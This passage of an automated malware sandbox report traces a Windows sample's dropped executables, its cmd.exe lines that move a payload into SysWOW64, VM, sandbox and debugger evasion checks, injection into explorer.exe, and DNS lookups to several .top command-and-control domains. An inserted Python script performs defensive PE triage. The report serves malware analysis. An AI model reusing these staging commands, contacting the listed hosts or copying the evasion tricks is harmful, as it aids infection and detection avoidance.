                    Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\E52D.exe C:\Users\user\AppData\Local\Temp\E52D.exe
                    Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\FE25.exe C:\Users\user\AppData\Local\Temp\FE25.exe
                    Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\247A.exe C:\Users\user\AppData\Local\Temp\247A.exe
                    Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\E52D.exe 'C:\Users\user\AppData\Local\Temp\E52D.exe'
                    Source: C:\Users\user\AppData\Local\Temp\247A.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\3DEF.exe C:\Users\user\AppData\Local\Temp\3DEF.exe
                    Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\E52D.exe 'C:\Users\user\AppData\Local\Temp\E52D.exe'
                    Source: C:\Users\user\AppData\Local\Temp\3DEF.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C mkdir C:\Windows\SysWOW64\gelvdtot\
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\3DEF.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\dkwjsfga.exe' C:\Windows\SysWOW64\gelvdtot\
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\6CB1.tmp
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\8433.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:120:WilError_01
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Command line argument: PN@
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exe | Command line argument: PN@
                    Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 reads)
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: pAWNholT8X.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: Z:\Development\Secureuser\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 8433.exe
                    Source: Binary string: #fNC:\neziyotugi voyosededidi.pdb source: 6CB1.exe, 00000010.00000000.473271527.0000000000412000.00000002.00020000.sdmp
                    Source: Binary string: C:\neziyotugi voyosededidi.pdb source: 6CB1.exe, 00000010.00000000.473271527.0000000000412000.00000002.00020000.sdmp
                    Source: Binary string: C:\hebesolazo\fanelugiken.pdb source: pAWNholT8X.exe, 00000000.00000002.364281095.0000000000412000.00000002.00020000.sdmp, ecrjwib, 0000000F.00000000.461024163.0000000000412000.00000002.00020000.sdmp
                    Source: Binary string: )/C:\hebesolazo\fanelugiken.pdb source: pAWNholT8X.exe, 00000000.00000002.364281095.0000000000412000.00000002.00020000.sdmp, ecrjwib, 0000000F.00000000.461024163.0000000000412000.00000002.00020000.sdmp

                    Data Obfuscation:

                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Unpacked PE file: 4.2.pAWNholT8X.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                    Source: C:\Users\user\AppData\Local\Temp\8433.exe | Unpacked PE file: 19.2.8433.exe.300000.0.unpack :ER; :R; :R;.idata:W;.themida:EW;.boot:ER;MSI GF65:ER;MSI GF65:ER;.rsrc:R; vs :ER; :R; :R;
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exe | Unpacked PE file: 20.2.6CB1.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 0_2_00402999 push ecx; ret
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 0_2_00659D01 push eax; ret
                    Source: C:\Users\user\AppData\Roaming\ecrjwib | Code function: 15_2_007693E1 push eax; ret
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exe | Code function: 16_2_00402999 push ecx; ret
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exe | Code function: 16_2_007A98D9 push eax; ret
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Code function: 17_2_051B2077 push ebx; retf
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Code function: 17_2_051C5D98 pushad ; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Code function: 17_2_051C6DCF push eax; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Code function: 17_2_051C6F31 push ecx; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Code function: 17_2_051C6F33 push ecx; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Code function: 17_2_051C6FAF push ebp; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Code function: 17_2_051C3FA9 push ds; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Code function: 17_2_051C3FA0 push ds; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Code function: 17_2_051C796B pushad ; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Code function: 17_2_051C79FF pushad ; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Code function: 17_2_051C4013 push ds; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Code function: 17_2_051C7071 push esi; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Code function: 17_2_051C7B00 pushad ; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Code function: 17_2_051C7B03 pushad ; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Code function: 17_2_051C7A71 pushad ; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Code function: 17_2_051C7AC9 pushad ; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Code function: 17_2_051C7ACB pushad ; iretd
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 0_2_00405286 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                    Source: 757C.exe.6.dr | Static PE information: compile timestamp 0x9DFA6F45 [Sat Dec 27 08:03:17 2053 UTC] (a date in the future, so not a genuine build time)
                    Source: 8433.exe.6.dr | Static PE information: section name: (empty) (3 sections)
                    Source: 8433.exe.6.dr | Static PE information: section name: .themida
                    Source: 8433.exe.6.dr | Static PE information: section name: .boot
                    Source: 8433.exe.6.dr | Static PE information: section name: MSI GF65 (2 sections)
                    Source: CEB6.exe.6.dr | Static PE information: section name: (empty) (3 sections)
                    Source: CEB6.exe.6.dr | Static PE information: section name: Intel Co
                    Source: CEB6.exe.6.dr | Static PE information: section name: .themida
                    Source: CEB6.exe.6.dr | Static PE information: section name: Intel Co
                    Source: FE25.exe.6.dr | Static PE information: section name: RAM 8GB (3 sections)
                    Source: initial sample | Static PE information: section where entry point is pointing to: .boot
                    Source: CEB6.exe.6.dr | Static PE information: real checksum: 0x34f922 should be: 0x353a8e
                    Source: 757C.exe.6.dr | Static PE information: real checksum: 0x0 should be: 0x73fa7
                    Source: initial sample | Static PE information: section name: .text entropy: 7.5513445643
                    Source: initial sample | Static PE information: section name: .text entropy: 7.56187374958
                    Source: initial sample | Static PE information: section name: (empty) entropy: 7.98639479395
                    Source: initial sample | Static PE information: section name: .boot entropy: 7.9543414958
                    Source: initial sample | Static PE information: section name: MSI GF65 entropy: 7.3616909148
                    Source: initial sample | Static PE information: section name: MSI GF65 entropy: 7.38545121469
                    Source: initial sample | Static PE information: section name: (empty) entropy: 7.98585699805
                    Source: initial sample | Static PE information: section name: Intel Co entropy: 7.37183763951
                    Source: initial sample | Static PE information: section name: .text entropy: 7.53272046759
                    Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\ecrjwib
                    Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\6CB1.exe
                    Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\E52D.exe
                    Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\8433.exe
                    Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\CEB6.exe
                    Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\757C.exe
                    Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\FE25.exe
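The Data Obfuscation block above rests on four static checks that any PE triage should reproduce: sections whose rights change to writable and executable once unpacked (.text:EW), sections with entropy close to 8 bits per byte (the unnamed, .boot and Intel Co sections), hardware-looking section names ("MSI GF65", "RAM 8GB", "Intel Co") with the entry point sitting in .boot rather than .text, and a header checksum that does not match the file (757C.exe ships 0x0 where 0x73fa7 is expected). The script below is an added example, not code from the Joe Sandbox report or from pefile: it walks the section table by hand with struct, computes Shannon entropy per section and the loader's PE checksum, and emits the same kind of findings. The three-section PE it analyses is constructed in build_sample_pe() and is not one of the dropped files.

```python
import math
import random
import struct
from collections import Counter
from typing import Dict, List

IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE = 0x00000020, 0x20000000
IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x40000000, 0x80000000
COMMON_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".tls", ".bss", ".pdata"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniformly random bytes."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def parse_pe(pe: bytes) -> Dict:
    """Walk DOS header -> PE signature -> COFF header -> section table with struct only."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe_off = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", pe, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", pe, pe_off + 20)[0]
    opt_off = pe_off + 24
    info = {"entry_point": struct.unpack_from("<I", pe, opt_off + 16)[0],
            "checksum_offset": opt_off + 64,
            "stored_checksum": struct.unpack_from("<I", pe, opt_off + 64)[0],
            "sections": []}
    for i in range(nsec):
        name, vsize, va, rsize, rptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, opt_off + opt_size + 40 * i)
        info["sections"].append({
            "name": name.rstrip(b"\0").decode("latin-1"), "va": va, "size": max(vsize, rsize),
            "entropy": round(shannon_entropy(pe[rptr:rptr + rsize]), 3),
            "x": bool(chars & IMAGE_SCN_MEM_EXECUTE), "w": bool(chars & IMAGE_SCN_MEM_WRITE)})
    return info


def pe_checksum(pe: bytes, checksum_offset: int) -> int:
    """IMAGE_OPTIONAL_HEADER.CheckSum as the loader computes it: fold every 32-bit word
    except the CheckSum field itself into 16 bits with end-around carry, add the file length."""
    padded = pe + b"\0" * (-len(pe) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:  # the field is 4-byte aligned in every well-formed PE
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(pe)


def triage(pe: bytes) -> List[str]:
    """Static findings in the style of the report's Data Obfuscation block."""
    info, findings = parse_pe(pe), []
    for s in info["sections"]:
        label = s["name"] or "(empty)"
        if s["x"] and s["w"]:
            findings.append(f"{label}: writable and executable")
        if s["x"] and s["entropy"] > 7.0:
            findings.append(f"{label}: executable with entropy {s['entropy']} (packed or encrypted)")
        if s["name"] not in COMMON_NAMES:
            findings.append(f"{label}: non-standard section name")
        if s["va"] <= info["entry_point"] < s["va"] + s["size"] and s["name"] != ".text":
            findings.append(f"{label}: entry point outside .text")
    computed = pe_checksum(pe, info["checksum_offset"])
    if info["stored_checksum"] != computed:
        findings.append(f"checksum: real 0x{info['stored_checksum']:x} should be 0x{computed:x}")
    return findings


def build_sample_pe(checksum: int = 0) -> bytes:
    """Constructed three-section PE32 (not one of the dropped files): .text with repetitive
    code bytes, .boot with a random blob that holds the entry point, and an RWX 'MSI GF65'."""
    rng = random.Random(1)
    specs = [(b".text", b"\x55\x8b\xec" * 200, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
             (b".boot", bytes(rng.getrandbits(8) for _ in range(4096)), IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
             (b"MSI GF65", b"\0" * 512, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)]
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)       # PE32 magic
    struct.pack_into("<I", opt, 16, 0x2000)     # AddressOfEntryPoint, inside .boot
    struct.pack_into("<I", opt, 28, 0x400000)   # ImageBase
    struct.pack_into("<I", opt, 64, checksum)   # CheckSum; 0 is what 757C.exe ships with
    coff = struct.pack("<HHIIIHH", 0x14C, len(specs), 0, 0, 0, len(opt), 0x0102)
    headers, data, raw_ptr, va = b"", b"", 0x400, 0x1000
    for name, payload, chars in specs:
        payload = payload.ljust(-(-len(payload) // 512) * 512, b"\0")   # 512-byte file alignment
        headers += struct.pack("<8sIIIIIIHHI", name, len(payload), va, len(payload), raw_ptr, 0, 0, 0, 0, chars)
        data, raw_ptr, va = data + payload, raw_ptr + len(payload), va + 0x1000
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    return (dos + b"PE\0\0" + coff + opt + headers).ljust(0x400, b"\0") + data
```

triage(build_sample_pe()) yields six findings: the RWX "MSI GF65" section, the high-entropy .boot section that also holds the entry point, two non-standard section names and the checksum mismatch. Rebuilding the sample with the computed checksum written into the header makes the last finding disappear, which is the same round trip Windows performs when it validates a driver or system DLL image. On real files, replace build_sample_pe() with open(path, "rb").read(); the parser needs nothing beyond the standard library.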

                    Hooking and other Techniques for Hiding and Protection:

                    Uses known network protocols on non-standard ports
                    Source: unknown | Network traffic detected: HTTP traffic on port 49841 -> 9080
                    Source: unknown | Network traffic detected: HTTP traffic on port 9080 -> 49841
                    Deletes itself after installation
                    Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\pawnholt8x.exe
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\ecrjwib:Zone.Identifier (access: read attributes | delete)
                    Source: C:\Windows\explorer.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX (4 times)
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Process information set: NOOPENFILEERRORBOX (44 times)
                    Source: C:\Users\user\AppData\Local\Temp\8433.exe | Process information set: NOOPENFILEERRORBOX (28 times)

Malware Analysis System Evasion:

Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\8433.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\Local\Temp\8433.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: pAWNholT8X.exe, 00000004.00000002.435547684.000000000072A000.00000004.00000020.sdmp Binary or memory string: ASWHOOK
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\FE25.exe RDTSC instruction interceptor: First address: 00000000017D47ED second address: 00000000017D47FF instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 or esi, 19626E18h 0x00000009 inc ecx 0x0000000a pop edx 0x0000000b dec eax 0x0000000c cdq 0x0000000d inc ecx 0x0000000e dec bl 0x00000010 inc ecx 0x00000011 pop ebx 0x00000012 rdtsc
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\pAWNholT8X.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Windows\System32\svchost.exe TID: 6120 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\757C.exe TID: 6264 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8433.exe TID: 6736 Thread sleep time: -48000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\757C.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 573
Source: C:\Users\user\AppData\Local\Temp\8433.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\8433.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\8433.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: explorer.exe, 00000006.00000000.422145782.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000006.00000000.422273157.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: 757C.exe, 00000016.00000002.688075628.0000000006665000.00000004.00000001.sdmp Binary or memory string: VMware
Source: explorer.exe, 00000006.00000000.399222853.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.422145782.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000006.00000000.404675893.0000000008551000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$$t<a
Source: svchost.exe, 0000000D.00000002.502918415.000001D408270000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW0
Source: svchost.exe, 0000000D.00000002.503887822.000001D4082EB000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000006.00000000.376541265.000000000095C000.00000004.00000020.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}R
Source: explorer.exe, 00000006.00000000.421771506.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000006.00000000.421771506.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: 757C.exe, 00000016.00000002.688075628.0000000006665000.00000004.00000001.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareB7WSVAM5Win32_VideoControllerM7PFZW8UVideoController120060621000000.000000-00019543348display.infMSBDAWDBGRY9PPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsP9LS9DUN
Source: explorer.exe, 00000006.00000000.422273157.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000006.00000000.376541265.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: C:\Users\user\Desktop\pAWNholT8X.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\pAWNholT8X.exe System information queried: ModuleInformation

Anti Debugging:

Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\8433.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\8433.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\8433.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\8433.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\8433.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\8433.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\8433.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\8433.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\8433.exe Thread information set: HideFromDebugger
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\pAWNholT8X.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 0_2_00405286 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 0_2_00656F53 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\ecrjwib Code function: 15_2_00590042 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\ecrjwib Code function: 15_2_00766633 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 16_2_00730042 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 16_2_007A6B2B push dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\pAWNholT8X.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 0_2_004034A5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 4_2_0040288D LdrLoadDll,
Source: C:\Users\user\AppData\Local\Temp\757C.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 0_2_0040782F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 0_2_00403977 SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 0_2_00404BF5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 16_2_0040782F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 16_2_004034A5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 16_2_00403977 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 16_2_00404BF5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: nityanneron5.top
Source: C:\Windows\explorer.exe Domain query: lynettaram7.top
Source: C:\Windows\explorer.exe Domain query: umayaniela6.top
Source: C:\Windows\explorer.exe Domain query: jebeccallis4.top
Source: C:\Windows\explorer.exe Domain query: privacy-toolz-for-you-403.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80
Source: C:\Windows\explorer.exe Domain query: sadineyalas8.top
Source: C:\Windows\explorer.exe Domain query: naghenrietti1.top
Source: C:\Windows\explorer.exe Domain query: geenaldencia9.top
Source: C:\Windows\explorer.exe Domain query: kimballiett2.top
Source: C:\Windows\explorer.exe Domain query: xadriettany3.top
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: ecrjwib.6.dr
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\pAWNholT8X.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\pAWNholT8X.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Injects a PE file into a foreign process
Source: C:\Users\user\AppData\Roaming\ecrjwib Memory written: C:\Users\user\AppData\Roaming\ecrjwib base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Memory written: C:\Users\user\AppData\Local\Temp\6CB1.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\757C.exe Memory written: C:\Users\user\AppData\Local\Temp\757C.exe base: 400000 value starts with: 4D5A
Contains functionality to inject code into remote processes
